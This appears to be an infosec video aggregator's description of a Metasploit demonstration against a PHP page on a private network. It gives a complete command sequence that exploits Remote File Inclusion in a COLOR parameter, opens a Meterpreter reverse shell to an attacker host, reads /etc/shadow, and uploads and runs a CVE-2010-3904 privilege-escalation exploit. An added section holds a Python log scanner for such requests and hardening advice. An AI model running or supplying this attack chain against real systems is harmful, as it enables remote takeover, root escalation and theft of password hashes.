Description: Target: http://192.168.178.47/test/index.php
The COLOR variable is vulnerable to Remote File Inclusion.
Metasploit commands:
use exploit/unix/webapp/php_include
show options
set PATH /test/
set PHPURI /index.php?COLOR=XXpathXX
set RHOST 192.168.178.47
ifconfig
set SRVHOST 192.168.178.21
show options
set PAYLOAD php/meterpreter_reverse_tcp
show options
set LHOST 192.168.178.21
exploit
getuid
getpid
ps
sysinfo
pwd
ls
cat index.php
cat /etc/shadow
lpwd
lcd /home/eromang/exploits/linux/local_escalations
upload linux-rds-exploit_CVE-2010-3904
execute -i -f bash
id
chmod u+x linux-rds-exploit_CVE-2010-3904
./linux-rds-exploit_CVE-2010-3904
id
cat /etc/shadow
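
Detection side of the above, as an added example that is not part of the original video or description: a Python check that scans web server access logs for query parameters whose value is a remote URL or PHP stream wrapper, which is how a Remote File Inclusion request against a parameter like COLOR shows up. It goes beyond the COLOR case by checking every parameter; the log lines, dates, port and the /EXAMPLE path are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# URL schemes / PHP wrappers that should not appear as an include-style parameter value.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect|phar):", re.I)
# Minimal matcher for the request field of an Apache common/combined log line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not taken from the page).
SAMPLE_LOG = [
    '192.168.178.30 - - [10/Nov/2010:10:00:01 +0100] "GET /test/index.php?COLOR=blue HTTP/1.1" 200 812',
    '192.168.178.21 - - [10/Nov/2010:10:00:05 +0100] "GET /test/index.php?COLOR=http://192.168.178.21:8080/EXAMPLE HTTP/1.1" 200 312',
    '192.168.178.21 - - [10/Nov/2010:10:00:09 +0100] "GET /test/index.php?COLOR=hTTp%3A%2F%2F192.168.178.21%2FEXAMPLE%3F HTTP/1.1" 200 312',
    '192.168.178.21 - - [10/Nov/2010:10:00:12 +0100] "GET /test/index.php?COLOR=http%253A%252F%252F192.168.178.21%252FEXAMPLE HTTP/1.1" 200 312',
    '192.168.178.30 - - [10/Nov/2010:10:00:15 +0100] "GET /test/style.css HTTP/1.1" 200 100',
]

def rfi_candidates(lines):
    """Return (client_ip, path, parameter, decoded_value, status) per suspicious parameter."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log request line
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double-encoded values.
            decoded = unquote(value)
            if REMOTE_VALUE.match(decoded):
                hits.append((m.group("ip"), url.path, name, decoded, int(m.group("status"))))
    return hits

if __name__ == "__main__":
    for ip, path, name, value, status in rfi_candidates(SAMPLE_LOG):
        # A 200 response to such a request deserves a closer look than a 4xx.
        print(f"{ip} {path} {name}={value} status={status}")
```

Parameters that legitimately carry URLs (redirect targets, for example) will also match and need an exclusion list. On the server, the matching hardening is PHP's allow_url_include = Off together with mapping the parameter to a fixed allow-list of local files.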
Tags: metasploit, rfi, privilege escalation, php
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.